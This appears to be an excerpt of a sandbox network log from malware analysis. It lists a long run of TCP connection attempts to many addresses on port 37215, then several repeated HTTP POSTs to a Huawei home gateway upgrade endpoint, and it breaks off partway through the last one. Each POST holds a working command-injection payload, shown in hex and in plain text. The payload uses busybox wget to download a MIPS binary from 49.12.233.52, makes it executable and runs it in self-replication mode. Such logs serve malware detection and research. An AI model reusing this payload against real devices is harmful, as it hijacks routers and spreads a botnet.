Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.138.175.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.249.215.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.56.102.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.236.89.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.136.135.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.219.96.150:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.29.252.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.28.144.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.245.19.165:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.75.158.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.188.3.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.59.34.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.76.179.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:34732 -> 49.12.233.52:59666
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.165.76.182:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.55.77.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.52.215.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.194.40.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.132.198.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.1.9.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.92.197.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.175.250.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.187.69.239:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.156.132.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.105.40.246:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.240.91.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.195.242.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.150.13.191:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.65.253.102:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.9.14.149:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.168.122.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.93.232.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.16.162.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.123.33.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.65.214.9:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.115.67.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.149.220.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.16.148.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.107.196.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.241.194.155:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.205.79.253:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.26.130.150:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.139.188.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.11.203.45:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.194.99.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.81.27.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.37.51.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.213.87.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.213.126.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.80.157.52:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.239.40.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.154.251.80:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.119.167.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.163.117.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.81.158.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.105.210.155:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.252.220.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.156.233.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.229.109.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.60.164.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.65.11.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.19.175.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.114.245.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.212.88.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.241.120.170:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.3.10.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.34.198.93:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.193.80.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.135.68.102:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.59.71.220:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.89.50.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.176.225.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.206.133.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.235.109.25:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.217.151.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.166.51.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.28.187.43:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.109.20.83:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.112.45.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.65.213.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.164.253.14:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.200.123.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.105.68.158:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.251.24.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.211.33.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.9.15.173:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.64.70.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.182.132.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.62.118.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.215.173.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.140.244.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.76.199.97:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.27.157.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.219.69.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.214.163.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.134.76.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.163.15.111:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.176.195.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.164.184.251:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.157.228.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.67.121.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.194.90.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.147.18.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.241.85.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.4.135.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.180.112.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.117.83.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.97.245.86:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.54.29.44:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.21.139.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.31.147.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.41.100.222:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.132.103.233:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.112.25.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.70.169.250:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.244.237.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.105.213.133:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.234.179.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.56.218.250:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.47.182.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.96.150.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.15.63.27:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.0.18.128:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.114.42.85:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.167.156.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.29.121.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.189.211.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.255.70.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.238.216.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.231.51.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.233.76.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.137.90.184:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.212.124.27:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.15.74.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.249.101.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.226.208.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.63.39.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.79.21.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.7.221.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.163.94.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.181.13.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.44.20.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.127.110.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.222.161.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.248.4.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.98.128.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.128.77.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.154.111.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.8.132.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.141.202.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.198.164.14:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.181.173.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.148.193.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.248.7.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.6.248.59:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.177.123.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.135.135.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.208.225.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.113.96.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.136.20.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.107.220.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.184.107.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.156.69.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.85.39.83:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.85.50.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.80.36.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.234.175.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.6.56.210:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.22.51.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.29.126.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.82.164.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.55.16.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.146.207.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.157.121.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.107.114.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.52.175.25:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.171.61.185:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.172.197.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.118.203.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.180.234.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.92.198.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.103.77.196:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.252.32.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.155.200.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.197.213.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.158.66.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.32.166.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.83.94.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.233.196.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.46.177.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.101.45.72:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.159.74.20:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.122.217.146:37215

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 